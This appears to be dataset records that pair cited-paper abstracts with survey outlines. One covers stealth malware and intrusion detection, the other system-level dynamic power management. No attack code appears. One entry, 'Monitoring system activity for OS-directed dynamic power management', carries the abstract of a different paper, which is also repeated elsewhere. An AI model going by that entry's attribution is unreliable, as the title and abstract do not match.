Nearest Non-Outlier (NNO) algorithm that evolves the model efficiently, adding object categories incrementally while detecting outliers and managing open space risk. We perform experiments on the ImageNet dataset with 1.2M+ images to validate the effectiveness of our method on large scale visual recognition tasks. NNO consistently yields superior results on open world recognition. --- paper_title: A building block for awareness in technical systems: Online novelty detection and reaction with an application in intrusion detection paper_content: In this article we propose a new building block to realize awareness in technical systems, a two-stage algorithm for online novelty detection and reaction in a probabilistic framework. It uses a combination of parametric as well as nonparametric density modeling techniques. First, observed samples are categorized as potentially novel. 
Then, clusters of potentially novel samples are identified and finally probabilistic models of the observed environment are extended by adding new model components that describe the novel process. To demonstrate the applicability of the proposed algorithm in self-adapting technical systems, we investigate a case study in the field of intrusion detection, where new kinds of attacks have to be identified by an intrusion detection system. That is, the algorithm is used in this article to realize environment-awareness, but it could in principle be taken for self- or context-awareness mechanisms, too. --- paper_title: Outlier Detection In Large-scale Traffic Data By Naïve Bayes Method and Gaussian Mixture Model Method paper_content: It is meaningful to detect outliers in traffic data for traffic management. However, it is a massive task to distinguish outliers in a large-scale database. In this paper, we present two methods, the Kernel Smoothing Naïve Bayes (NB) method and the Gaussian Mixture Model (GMM) method, to automatically detect any hardware errors as well as abnormal traffic events in traffic data collected at a four-arm junction in Hong Kong. Traffic data was recorded in a video format, and converted to spatial-temporal (ST) traffic signals by statistics. The ST signals are then projected to a two-dimensional (2D) (x,y)-coordinate plane by Principal Component Analysis (PCA) for dimension reduction. We assume that inlier data are normally distributed. As such, the NB and GMM methods are successfully applied in outlier detection (OD) for traffic data. The kernel smooth NB method assumes the existence of kernel distributions in traffic data and uses Bayes' Theorem to perform OD. In contrast, the GMM method assumes the traffic data is formed by a mixture of Gaussian distributions and exploits a confidence region for OD. This paper addresses the modeling of each method and evaluates their respective performances. Experimental results show that the NB algorithm with a triangle kernel and the GMM method achieve up to 93.78% and 94.50% accuracies, respectively. --- paper_title: Novelty detection: a review - part 1: statistical approaches paper_content: Novelty detection is the identification of new or unknown data or signal that a machine learning system is not aware of during training. Novelty detection is one of the fundamental requirements of a good classification or identification system since sometimes the test data contains information about objects that were not known at the time of training the model. In this paper we provide a state-of-the-art review in the area of novelty detection based on statistical approaches. The second part of the review details novelty detection using neural networks. As discussed, there are a multitude of applications where novelty detection is extremely important, including signal processing, computer vision, pattern recognition, data mining, and robotics. --- paper_title: Online Adaboost-Based Parameterized Methods for Dynamic Distributed Network Intrusion Detection paper_content: Current network intrusion detection systems lack adaptability to the frequently changing network environments. Furthermore, intrusion detection in the new distributed architectures is now a major requirement. In this paper, we propose two online Adaboost-based intrusion detection algorithms. In the first algorithm, a traditional online Adaboost process is used where decision stumps are used as weak classifiers. 
In the second algorithm, an improved online Adaboost process is proposed, and online Gaussian mixture models (GMMs) are used as weak classifiers. We further propose a distributed intrusion detection framework, in which a local parameterized detection model is constructed in each node using the online Adaboost algorithm. A global detection model is constructed in each node by combining the local parametric models using a small number of samples in the node. This combination is achieved using an algorithm based on particle swarm optimization (PSO) and support vector machines. The global model in each node is used to detect intrusions. Experimental results show that the improved online Adaboost process with GMMs obtains a higher detection rate and a lower false alarm rate than the traditional online Adaboost process that uses decision stumps. Both the algorithms outperform existing intrusion detection algorithms. It is also shown that our PSO, and SVM-based algorithm effectively combines the local detection models into the global model in each node; the global model in a node can handle the intrusion types that are found in other nodes, without sharing the samples of these intrusion types. --- paper_title: Robust Fusion: Extreme Value Theory for Recognition Score Normalization paper_content: Recognition problems in computer vision often benefit from a fusion of different algorithms and/or sensors, with score level fusion being among the most widely used fusion approaches. Choosing an appropriate score normalization technique before fusion is a fundamentally difficult problem because of the disparate nature of the underlying distributions of scores for different sources of data. Further complications are introduced when one or more fusion inputs outright fail or have adversarial inputs, which we find in the fields of biometrics and forgery detection. Ideally a score normalization should be robust to model assumptions, modeling errors, and parameter estimation errors, as well as robust to algorithm failure. In this paper, we introduce the w-score, a new technique for robust recognition score normalization. We do not assume a match or non-match distribution, but instead suggest that the top scores of a recognition system's non-match scores follow the statistical Extreme Value Theory, and show how to use that to provide consistent robust normalization with a strong statistical basis. --- paper_title: Concept drift detection for online class imbalance learning paper_content: Concept drift detection methods are crucial components of many online learning approaches. Accurate drift detections allow prompt reaction to drifts and help to maintain high performance of online models over time. Although many methods have been proposed, no attention has been given to data streams with imbalanced class distributions, which commonly exist in real-world applications, such as fault diagnosis of control systems and intrusion detection in computer networks. This paper studies the concept drift problem for online class imbalance learning. We look into the impact of concept drift on single-class performance of online models based on three types of classifiers, under seven different scenarios with the presence of class imbalance. The analysis reveals that detecting drift in imbalanced data streams is a more difficult task than in balanced ones. Minority-class recall suffers from a significant drop after the drift involving the minority class. Overall accuracy is not suitable for drift detection. 
Based on the findings, we propose a new detection method DDM-OCI derived from the existing method DDM. DDM-OCI monitors minority-class recall online to capture the drift. The results show a quick response of the online model working with DDM-OCI to the new concept. --- paper_title: Adaptive network intrusion detection system using a hybrid approach paper_content: Any activity aimed at disrupting a service or making a resource unavailable or gaining unauthorized access can be termed as an intrusion. Examples include buffer overflow attacks, flooding attacks, system break-ins, etc. Intrusion detection systems (IDSs) play a key role in detecting such malicious activities and enable administrators in securing network systems. Two key criteria should be met by an IDS for it to be effective: (i) the ability to detect unknown attack types, and (ii) a very low misclassification rate. In this paper we describe an adaptive network intrusion detection system that uses a two-stage architecture. In the first stage a probabilistic classifier is used to detect potential anomalies in the traffic. In the second stage an HMM-based traffic model is used to narrow down the potential attack IP addresses. Various design choices that were made to make this system practical and difficulties faced in integrating with existing models are also described. We show that this system achieves good performance empirically. --- paper_title: The Extreme Value Machine paper_content: It is often desirable to be able to recognize when inputs to a recognition function learned in a supervised manner correspond to classes unseen at training time. With this ability, new class labels could be assigned to these inputs by a human operator, allowing them to be incorporated into the recognition function—ideally under an efficient incremental update mechanism. While good algorithms that assume inputs from a fixed set of classes exist, e.g., artificial neural networks and kernel machines, it is not immediately obvious how to extend them to perform incremental learning in the presence of unknown query classes. Existing algorithms take little to no distributional information into account when learning recognition functions and lack a strong theoretical foundation. We address this gap by formulating a novel, theoretically sound classifier—the Extreme Value Machine (EVM). The EVM has a well-grounded interpretation derived from statistical Extreme Value Theory (EVT), and is the first classifier to be able to perform nonlinear kernel-free variable bandwidth incremental learning. Compared to other classifiers in the same deep network derived feature space, the EVM is accurate and efficient on an established benchmark partition of the ImageNet dataset.
--- paper_title: Applying CMAC-based online learning to intrusion detection paper_content: The timely and accurate detection of computer and network system intrusions has always been an elusive goal for system administrators and information security researchers. Existing intrusion detection approaches require either manual coding of new attacks in expert systems or the complete retraining of a neural network to improve analysis or learn new attacks. The paper presents an approach to applying adaptive neural networks to intrusion detection that is capable of autonomously learning new attacks rapidly by a modified reinforcement learning method that uses feedback from the protected system. --- paper_title: Multi-attribute spaces: Calibration for attribute fusion and similarity search paper_content: Recent work has shown that visual attributes are a powerful approach for applications such as recognition, image description and retrieval. However, fusing multiple attribute scores — as required during multi-attribute queries or similarity searches — presents a significant challenge. Scores from different attribute classifiers cannot be combined in a simple way; the same score for different attributes can mean different things. In this work, we show how to construct normalized “multi-attribute spaces” from raw classifier outputs, using techniques based on the statistical Extreme Value Theory. Our method calibrates each raw score to a probability that the given attribute is present in the image. We describe how these probabilities can be fused in a simple way to perform more accurate multi-attribute searches, as well as enable attribute-based similarity searches. A significant advantage of our approach is that the normalization is done after-the-fact, requiring neither modification to the attribute classification system nor ground truth attribute annotations. We demonstrate results on a large data set of nearly 2 million face images and show significant improvements over prior work. We also show that perceptual similarity of search results increases by using contextual attributes. 
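The extreme-value calibration idea that recurs in the entries above (w-scores, the Weibull-calibrated SVM, multi-attribute spaces) can be sketched in a few lines: fit a Weibull distribution to the largest non-match scores and read a new score off the fitted CDF as a rough inclusion probability. This is only an illustrative sketch, not the cited authors' procedures; the tail size, the scipy weibull_min fit, and the shift by the tail threshold are all assumptions.

# Minimal sketch of EVT-style score calibration: model the extreme tail of
# non-match scores with a Weibull and map raw scores to probabilities.
import numpy as np
from scipy.stats import weibull_min

def fit_tail(nonmatch_scores, tail_size=50):
    """Fit a Weibull to the exceedances of the largest non-match scores."""
    scores = np.sort(np.asarray(nonmatch_scores))
    tail = scores[-tail_size:]
    shift = scores[-tail_size - 1]                # threshold just below the tail
    c, _, scale = weibull_min.fit(tail - shift, floc=0.0)
    return c, shift, scale

def calibrated_probability(score, params):
    """Probability that `score` is extreme relative to the fitted non-match tail."""
    c, shift, scale = params
    return float(weibull_min.cdf(score - shift, c, loc=0.0, scale=scale))

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    nonmatch = rng.normal(0.0, 1.0, 5000)          # stand-in for impostor/non-match scores
    params = fit_tail(nonmatch)
    for s in (1.0, 2.5, 4.0):
        print(f"raw score {s:.1f} -> calibrated {calibrated_probability(s, params):.3f}")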
--- paper_title: CLUSTERING-BASED NETWORK INTRUSION DETECTION paper_content: Recently data mining methods have gained importance in addressing network security issues, including network intrusion detection — a challenging task in network security. Intrusion detection systems aim to identify attacks with a high detection rate and a low false alarm rate. Classification-based data mining models for intrusion detection are often ineffective in dealing with dynamic changes in intrusion patterns and characteristics. Consequently, unsupervised learning methods have been given a closer look for network intrusion detection. We investigate multiple centroid-based unsupervised clustering algorithms for intrusion detection, and propose a simple yet effective self-labeling heuristic for detecting attack and normal clusters of network traffic audit data. The clustering algorithms investigated include k-means, Mixture-Of-Spherical Gaussians, Self-Organizing Map, and Neural-Gas. The network traffic datasets provided by the DARPA 1998 offline intrusion detection project are used in our empirical investigation, which demonstrates the feasibility and promise of unsupervised learning methods for network intrusion detection. In addition, a comparative analysis shows the advantage of clustering-based methods over supervised classification techniques in identifying new or unseen attack types. --- paper_title: Approaches to Online Learning and Concept Drift for User Identification in Computer Security paper_content: The task in the computer security domain of anomaly detection is to characterize the behaviors of a computer user (the 'valid' or 'normal' user) so that unusual occurrences can be detected by comparison of the current input stream to the valid user's profile. This task requires an online learning system that can respond to concept drift and handle discrete non-metric time sequence data. We present an architecture for online learning in the anomaly detection domain and address the issues of incremental updating of system parameters and instance selection. 
We demonstrate a method for measuring the direction and magnitude of concept drift in the classification space, and present and evaluate approaches to the above-stated issues that make use of the drift measurement. --- paper_title: Anomalous Payload-Based Network Intrusion Detection paper_content: We present a payload-based anomaly detector, which we call PAYL, for intrusion detection. PAYL models the normal application payload of network traffic in a fully automatic, unsupervised and very efficient fashion. We first compute, during a training phase, a profile of the byte frequency distribution and its standard deviation for the application payload flowing to a single host and port. We then use the Mahalanobis distance during the detection phase to calculate the similarity of new data against the pre-computed profile. The detector compares this measure against a threshold and generates an alert when the distance of the new input exceeds this threshold. We demonstrate the surprising effectiveness of the method on the 1999 DARPA IDS dataset and a live dataset we collected on the Columbia CS department network. In one case nearly 100% accuracy is achieved with a 0.1% false positive rate for port 80 traffic. --- paper_title: Generation of a new IDS test dataset: Time to retire the KDD collection paper_content: Intrusion detection systems are generally tested using datasets compiled at the end of last century, justified by the need for publicly available test data and the lack of any other alternative datasets. Prominent amongst this legacy group is the KDD project. Whilst a seminal contribution at the time of compilation, these datasets no longer represent relevant architecture or contemporary attack protocols, and are beset by data corruptions and inconsistencies. Hence, testing of new IDS approaches against these datasets does not provide an effective performance metric, and contributes to erroneous efficacy claims. This paper introduces a new publicly available dataset which is representative of modern attack structure and methodology. The new dataset is contrasted with the legacy datasets, and the performance difference of commonly used intrusion detection algorithms is highlighted. --- paper_title: A Semantic Approach to Host-Based Intrusion Detection Systems Using Contiguous and Discontiguous System Call Patterns paper_content: Host-based anomaly intrusion detection system design is very challenging due to the notoriously high false alarm rate. This paper introduces a new host-based anomaly intrusion detection methodology using discontiguous system call patterns, in an attempt to increase detection rates whilst reducing false alarm rates. The key concept is to apply a semantic structure to kernel level system calls in order to reflect intrinsic activities hidden in high-level programming languages, which can help understand program anomaly behaviour. Excellent results were demonstrated using a variety of decision engines, evaluating the KDD98 and UNM data sets, and a new, modern data set. The ADFA Linux data set was created as part of this research using a modern operating system and contemporary hacking methods, and is now publicly available. Furthermore, the new semantic method possesses an inherent resilience to mimicry attacks, and demonstrated a high level of portability between different operating system versions. ---
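The PAYL entry above describes a concrete recipe: a per-byte frequency profile plus a simplified Mahalanobis distance compared against a threshold. A minimal sketch of that style of detector follows. The smoothing constant, the threshold rule, and the toy HTTP training payloads are illustrative assumptions; a real implementation would at least condition profiles on the destination host and port, as the abstract notes.

# Hedged sketch of a PAYL-style payload anomaly detector: per-byte frequency
# profile (mean and standard deviation of each byte value's relative frequency)
# from training payloads, then a simplified Mahalanobis-style score for new data.
import numpy as np

def byte_histogram(payload: bytes) -> np.ndarray:
    counts = np.bincount(np.frombuffer(payload, dtype=np.uint8), minlength=256)
    return counts / max(len(payload), 1)           # relative byte frequencies

def train_profile(payloads):
    freqs = np.stack([byte_histogram(p) for p in payloads])
    return freqs.mean(axis=0), freqs.std(axis=0)

def anomaly_score(payload, mean, std, smoothing=0.001):
    f = byte_histogram(payload)
    return float(np.sum(np.abs(f - mean) / (std + smoothing)))  # simplified distance

if __name__ == "__main__":
    normal = [f"GET /page{i}.html HTTP/1.0\r\nHost: example.com\r\n\r\n".encode()
              for i in range(50)]                  # toy training traffic
    mean, std = train_profile(normal)
    threshold = max(anomaly_score(p, mean, std) for p in normal) * 1.2
    probe = b"\x90" * 40 + b"/bin/sh"              # shellcode-like payload
    print("alert" if anomaly_score(probe, mean, std) > threshold else "ok")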
Title: A Survey of Stealth Malware Attacks, Mitigation Measures, and Steps Toward Autonomous Open World Solutions Section 1: A Survey of Existing Stealth Malware Description 1: Discuss various types of stealth technology including rootkits, code mutation, anti-emulation, and targeting mechanisms, explaining each in detail. Section 2: Component-Based Stealth Malware Countermeasures Description 2: Explain anti-stealth malware techniques that protect system integrity, including hook detection, cross-view detection, invariant specification, and hardware and virtualization solutions. Section 3: Pattern-Based Stealth Malware Countermeasures Description 3: Describe generic recognition techniques for malware detection, focusing on static and dynamic analysis, signature analysis, and behavioral/heuristic analysis. Section 4: Toward Adaptive Models for Stealth Malware Recognition Description 4: Discuss the need for adaptive and interpretable recognition systems, detailing six flawed modeling assumptions and proposing an adaptive open world mathematical framework for improved stealth malware recognition. Section 5: An Open Set Recognition Framework Description 5: Explain the open set recognition problem, theorems proving open space risk management, and practical implementation to enhance existing intrusion recognition algorithms. Section 6: Open World Archetypes for Stealth Malware Intrusion Recognition Description 6: Discuss how open set recognition can be extended to open world recognition, supporting incremental model updates and prioritizing novel malware detection through malicious likelihood criteria. Section 7: Conclusions and Open Issues Description 7: Summarize findings, highlight the importance of combining countermeasures with machine learning solutions, and address open issues like bounding open space risk, misclassification costs, and the need for good datasets.
A survey of design techniques for system-level dynamic power management
5
--- paper_title: Dynamic Power Management: Design Techniques and CAD Tools paper_content: From the Publisher: Dynamic Power Management: Design Techniques and CAD Tools addresses design techniques and computer-aided design solutions for power management. Different approaches are presented and organized in an order related to their applicability to control-units, macro-blocks, digital circuits and electronic systems, respectively. All approaches are based on the principle of exploiting idleness of circuits, systems, or portions thereof. They involve both detection of idleness conditions and the freezing of power-consuming activities in the idle components. Dynamic Power Management: Design Techniques and CAD Tools is of interest to researchers and developers of computer-aided design tools for integrated circuits and systems, as well as to system designers. --- paper_title: Software Strategies for Portable Computer Energy Management paper_content: Limiting the energy consumption of computers, especially portables, is becoming increasingly important. Thus, new energy-saving computer components and architectures have been and continue to be developed. Many architectural features have both high-performance and low-power modes, with the mode selection under software control. The problem is to minimize energy consumption while not significantly impacting the effective performance. We group the software control issues as follows: transition, load-change, and adaptation. The transition problem is deciding when to switch to low-power, reduced-functionality modes. The load-change problem is determining how to modify the load on a component so that it can make further use of its low-power modes. The adaptation problem is determining how to create software that allows components to be used in novel, power-saving ways. We survey implemented and proposed solutions to software energy management issues created by existing and suggested hardware innovations. --- paper_title: PowerPC 603, a microprocessor for portable computers paper_content: The PowerPC 603 incorporates a variety of features to reduce power dissipation: dynamic idle-time shutdown of separate execution units, low-power cache design, and power considerations for standard cells, data-path elements, and clocking. System-level features include three software-programmable static power management modes and a hardware-programmable phase-lock loop. Operating at 80 MHz, the 603 typically dissipates 2.2 W, while achieving an estimated 75 Specint92 and 85 Specfp92. --- paper_title: Technology directions for portable computers paper_content: This paper contains an evaluation of trends in the key system parameters (e.g., size, weight, function, performance, battery life) for battery-powered portable computers, together with a review of development trends in the technologies required for such systems. The discussion focuses on notebook-size portable computers. Those technologies which will have substantial impact on battery life and power budgets of future notebook computers receive the primary emphasis in this paper: for example, liquid crystal displays, storage technology, wireless communication technology, and low power electronics. System power management is also addressed. 
The basic theme of this paper is first to develop a view of what the key attributes of future notebook computers will be, and then to discuss how technologies must evolve to allow such systems to be advanced over the current state of the art in terms of portability and battery life. --- paper_title: System-level power estimation and optimization paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy, which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of ~10%, and a 23% reduction in power after policy optimization. --- paper_title: Toward power-sensitive network architectures in wireless communications: concepts, issues, and design aspects paper_content: Transmitter power control can be used to concurrently achieve several key objectives in wireless networking, including minimizing power consumption and prolonging the battery life of mobile nodes, mitigating interference and increasing the network capacity, and maintaining the required link QoS by adapting to node movements, fluctuating interference, channel impairments, and so on. Moreover, power control can be used as a vehicle for implementing on-line several basic network operations, including admission control, channel selection and switching, and handoff control. We consider issues associated with the design of power-sensitive wireless network architectures, which utilize power efficiently in establishing user communication at required QoS levels. Our focus is mainly on the network layer and less on the physical one. Besides reviewing some of the developments in power control, we also formulate some general associated concepts which have wide applicability to wireless network design. A synthesis of these concepts into a framework for power-sensitive network architectures is done, based on some key justifiable points. Various important relevant issues are highlighted and discussed, as well as several directions for further research in this area. Overall, a first step is taken toward the design of power-sensitive network architectures for next-generation wireless networks. --- paper_title: Mobile power management for wireless communication networks paper_content: For fixed quality-of-service constraints and varying channel interference, how should a mobile node in a wireless network adjust its transmitter power so that energy consumption is minimized? Several transmission schemes are considered, and optimal solutions are obtained for channels with stationary, extraneous interference. A simple dynamic power management algorithm based on these solutions is developed. The algorithm is tested by a series of simulations, including the extraneous-interference case and the more general case where multiple, mutually interfering transmitters operate in a (therefore highly responsive) interference environment. 
Power management is compared with conventional power control for models based on FDMA/TDMA and CDMA cellular networks. Results show improved network capacity and stability in addition to substantially improved battery life at the mobile terminals. --- paper_title: Low power communications protocols: paging and beyond paper_content: Paging subscriber devices leverage multiple technologies to achieve low power and long battery life: semiconductors, circuits, systems architecture and network protocol. While many types of electronic devices have capitalized on low-power features for several of these technologies, few other than personal paging services have taken advantage of opportunities presented by well designed protocols with explicit power-reduction features. This paper will review the state-of-practice in existing paging services, and discuss the relevance of such techniques to other wireless communication systems. --- paper_title: Energy constrained error control for wireless channels paper_content: We posit that limiting the performance metrics of error control protocols to throughput and delay is inappropriate when terminals are powered by a finite energy battery source. We propose the total number of correctly transmitted packets during the lifetime of a finite energy source as another metric. We study the go-back-N error control protocol assuming (1) Markov errors on both the forward and the feedback channels and (2) a finite energy source with a flat power profile, and characterize the sensitivity of the total number of correctly transmitted packets to the choice of the output power level. We then generalize our results to arbitrary power profiles through both a recursive technique and Markov analysis. Finally, we compare the performance of GBN with an adaptive error control protocol (which slows down the transmission rate when the channel is impaired) and document the advantages. --- paper_title: Monitoring system activity for OS-directed dynamic power management paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy , which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of ∼10%, and a 23% reduction in power after policy optimization. --- paper_title: System-level power estimation and optimization paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy, which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. 
The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of /spl sim/10%, and a 23% reduction in power after policy optimization. --- paper_title: Guarded evaluation: pushing power management to logic synthesis/design paper_content: The need to reduce the power consumption of the next generation of digital systems is clearly recognized at all levels of system design. At the system level, power management is a very powerful technique and delivers large and unambiguous savings. The ideas behind power management can be extended to the logic level. This would involve determining which parts of a circuit are computing results that will be used and which are not. The parts that are not needed are then "shut off". This paper describes an approach termed guarded evaluation, which is an implementation of this idea. A theoretical framework and the algorithms that form the basis of the approach are presented. The underlying idea is to automatically determine the parts of the circuit that can be disabled on a per-clock-cycle basis. This saves the power used in all the useless transitions in those parts of the circuit. Initial experiments indicate substantial power savings and the strong potential of this approach for a large number of benchmark circuits. While this paper presents the development of these ideas at the logic level of design, the same ideas have direct application at the register-transfer level of design also. --- paper_title: Adaptive Disk Spindown via Optimal Rent-to-Buy in Probabilistic Environments paper_content: In the {single rent-to-buy decision} problem, without a priori knowledge of the amount of time a resource will be used we need to decide when to buy the resource, given that we can rent the resource for \$1 per unit time or buy it once and for all for \$$c$. In this paper we study algorithms that make a sequence of single rent-to-buy decisions, using the assumption that the resource use times are independently drawn from an unknown probability distribution. Our study of this rent-to-buy problem is motivated by important systems applications, specifically, problems arising from deciding when to spindown disks to conserve energy in mobile computers~[DKM, LKH, MDK], thread blocking decisions during lock acquisition in multiprocessor applications~[KLM], and virtual circuit holding times in IP-over-ATM networks~[KLP, SaK]. We develop a provably optimal and computationally efficient algorithm for the rent-to-buy problem and evaluate its practical merit for the disk spindown scenario via simulation studies. Our algorithm uses $O(\sqrt{t})$ time and space, and its expected cost for the $t$th resource use converges to optimal as $O(\sqrt{\log t/t})$, for any bounded probability distribution on the resource use times. Alternatively, using $O(1)$ time and space, the algorithm almost converges to optimal. We describe the results of simulating our algorithm for the disk spindown problem using disk access traces obtained from an HP workstation environment. We introduce the natural notion of {\em effective cost\/} which merges the effects of energy conservation and response time performance into one metric based on a user specified parameter~$a$, the relative importance of response time to energy conservation. (The buy cost~$c$ varies linearly with~$a$.) 
We observe that by varying~$a$, we can model the tradeoff between power and response time well. We also show that our algorithm is best in terms of effective cost for almost all values of~$a$, saving effective cost by 6--25\% over the optimal online algorithm in the competitive model~(i.e., the 2-competitive algorithm that spins down the disk after waiting~$c$ seconds). In addition, for small values of~$a$ (corresponding to when saving energy is critical), our algorithm when compared against the optimal online algorithm in the competitive model reduces excess energy by 17--60\%, and when compared against the 5~second threshold reduces excess energy by 6--42\%. --- paper_title: Idleness is not sloth paper_content: Many people have observed that computer systems spend much of their time idle, and various schemes have been proposed to use this idle time productively. The commonest approach is to off-load activity from busy periods to less-busy ones in order to improve system responsiveness. In addition, speculative work can be performed in idle periods in the hopes that it will be needed later at times of higher utilization, or a non-renewable resource like battery power can be conserved by disabling unused resources. We found opportunities to exploit idle time in our work on storage systems, and after a few attempts to tackle specific instances of it in ad hoc ways, began to investigate general mechanisms that could be applied to this problem. Our results include a taxonomy of idle-time detection algorithms, metrics for evaluating them, and an evaluation of a number of idleness predictors that we generated from our taxonomy. --- paper_title: Adaptive hard disk power management on personal computers paper_content: Dynamic power management can be effective for designing low-power systems. In many systems, requests are clustered into sessions. This paper proposes an adaptive algorithm that can predict session lengths and shut down components between sessions to save power. Compared to other approaches, simulations show that this algorithm can reduce power consumption in hard disks with less impact on performance or reliability. --- paper_title: Transformation and synthesis of FSMs for low-power gated-clock implementation paper_content: We present a technique that automatically synthesizes finite state machines with gated clocks to reduce the power dissipation of the final implementation. We describe a new transformation for general incompletely specified Mealy-type machines that makes them suitable for gated clock implementation. The transformation is probabilistic-driven, and leads to the synthesis of an optimized combinational logic block that stops the clock with --- paper_title: Adaptive Disk Spin-Down Policies for Mobile Computers paper_content: Mobile computers typically spin down their hard disk after a fixed period of inactivity. If this threshold is too long, the disk wastes energy; if it is too short, the delay due to spinning the disk up again frustrates the user. Usage patterns change over time, so a single fixed threshold may not be appropriate at all times. Also, different users may have varying priorities with respect to trading off energy conservation against performance. We describe a method for varying the spin-down threshold dynamically by adapting to the user's access patterns and priorities.
Adaptive spin-down can in some circumstances reduce by up to 50% the number of disk spin-ups that are deemed by the user to be inconvenient, while only moderately increasing energy consumption. --- paper_title: Predictive system shutdown and other architectural techniques for energy efficient programmable computation paper_content: With the popularity of portable devices such as personal digital assistants and personal communicators, as well as with increasing awareness of the economic and environmental costs of power consumption by desktop computers, energy efficiency has emerged as an important issue in the design of electronic systems. While power efficient ASIC's with dedicated architectures have addressed the energy efficiency issue for niche applications such as DSP, much of the computation continues to be implemented as software running on programmable processors such as microprocessors, microcontrollers, and programmable DSP's. Not only is this true for general purpose computation on personal computers and workstations, but also for portable devices, application-specific systems etc. In fact, firmware and embedded software executing on RISC and DSP processor cores that are embedded in ASIC's has emerged as a leading implementation methodology for speech coding, modem functionality, video compression, communication protocol processing etc. This paper describes architectural techniques for energy efficient implementation of programmable computation, particularly focussing on the computation needed in portable devices where event-driven user interfaces, communication protocols, and signal processing play a dominant role. Two key approaches described here are predictive system shutdown and extended voltage scaling. Results indicate that a large reduction in power consumption can be achieved over current day solutions with little or no loss in system performance. --- paper_title: A predictive system shutdown method for energy saving of event-driven computation paper_content: This paper presents a system-level power management technique for energy savings of event-driven applications. We present a new predictive system-shutdown method to exploit sleep mode operations for energy saving. We use an exponential-average approach to predict the upcoming idle period. We introduce two mechanisms, prediction-miss correction and prewake-up, to improve the hit ratio and to reduce the delay overhead. Experiments on four different event-driven applications show that our proposed method achieves high hit ratios in a wide range of delay overheads, which results in a high degree of energy saving with low delay penalties. --- paper_title: Competitive randomized algorithms for nonuniform problems paper_content: Competitive analysis is concerned with comparing the performance of on-line algorithms with that of optimal off-line algorithms. In some cases randomization can lead to algorithms with improved performance ratios on worst-case sequences. In this paper we present new randomized on-line algorithms for snoopy caching and the spin-block problem. These algorithms achieve competitive ratios approaching e/(e-1) ≈ 1.58 against an oblivious adversary. These ratios are optimal and are a surprising improvement over the best possible ratio in the deterministic case, which is 2. We also consider the situation when the request sequences for these problems are generated according to an unknown probability distribution.
In this case we show that deterministic algorithms that adapt to the observed request statistics also have competitive factors approaching e/(e-1). Finally, we obtain randomized algorithms for the 2-server problem on a class of isosceles triangles. These algorithms are optimal against an oblivious adversary and have competitive ratios that approach e/(e-1). This compares with the ratio of 3/2 that can be achieved on an equilateral triangle. --- paper_title: Precomputation-based sequential logic optimization for low power paper_content: We address the problem of optimizing logic-level sequential circuits for low power. We present a powerful sequential logic optimization method that is based on selectively precomputing the output logic values of the circuit one clock cycle before they are required, and using the precomputed values to reduce internal switching activity in the succeeding clock cycle. We present two different precomputation architectures which exploit this observation. We present an automatic method of synthesizing precomputational logic so as to achieve maximal reductions in power dissipation. We present experimental results on various sequential circuits. Up to 75% reductions in average switching activity and power dissipation are possible with marginal increases in circuit area and delay. --- paper_title: Dynamic power management for nonstationary service requests paper_content: Dynamic power management (DPM) is a design methodology aimed at reducing power consumption of electronic systems by performing selective shutdown of idle system resources. The effectiveness of a power management scheme depends critically on accurate modeling of service requests and on computation of the control policy. In this work, we present an online adaptive DPM scheme for systems that can be modeled as finite-state Markov chains. Online adaptation is required to deal with initially unknown or nonstationary workloads, which are very common in real-life systems. Our approach moves from exact policy optimization techniques in a known and stationary stochastic environment and extends optimum stationary control policies to handle the unknown and nonstationary stochastic environment for practical applications. We introduce two workload learning techniques based on sliding windows and study their properties. Furthermore, a two-dimensional interpolation technique is introduced to obtain adaptive policies from a precomputed look-up table of optimum stationary policies. The effectiveness of our approach is demonstrated by a complete DPM implementation on a laptop computer with a power-manageable hard disk that compares very favorably with existing DPM schemes. --- paper_title: Policy optimization for dynamic power management paper_content: Dynamic power management schemes (also called policies) can be used to control the power consumption levels of electronic systems, by setting their components in different states, each characterized by a performance level and a power consumption. In this paper, we describe power-managed systems using a finite-state, stochastic model. Furthermore, we show that the fundamental problem of finding an optimal policy which maximizes the average performance level of a system, subject to a constraint on the power consumption, can be formulated as a stochastic optimization problem called policy optimization. Policy optimization can be solved exactly in polynomial time (in the number of states of the model).
We implemented a policy optimization tool and tested the quality of the optimal policies on a realistic case study. --- paper_title: Dynamic power management based on continuous-time Markov decision processes paper_content: This paper introduces a continuous-time, controllable Markov process model of a power-managed system. The system model is composed of the corresponding stochastic models of the service queue and the service provider. The system environment is modeled by a stochastic service request process. The problem of dynamic power management in such a system is formulated as a policy optimization problem and solved using an efficient "policy iteration" algorithm. Compared to previous work on dynamic power management, our formulation allows better modeling of the various system components, the power-managed system as a whole, and its environment. In addition it captures dependencies between the service queue and service provider status. Finally, the resulting power management policy is asynchronous, hence it is more power-efficient and more useful in practice. Experimental results demonstrate the effectiveness of our policy optimization algorithm compared to a number of heuristic (time-out and N-policy) algorithms. --- paper_title: Event-driven power management of portable systems paper_content: The policy optimization problem for dynamic power management has received considerable attention in the recent past. We formulate policy optimization as a constrained optimization problem on continuous-time semi-Markov decision processes (SMDP). SMDPs generalize the stochastic optimization approach based on discrete-time Markov decision processes (DTMDP) presented in the earlier work by relaxing two limiting assumptions. In SMDPs, decisions are made at each event occurrence instead of at each discrete time interval as in DTMDP and thus saving power and giving higher performance. In addition, SMDPs can have general inter-state transition time distributions, allowing for greater generality and accuracy in modeling real-life systems 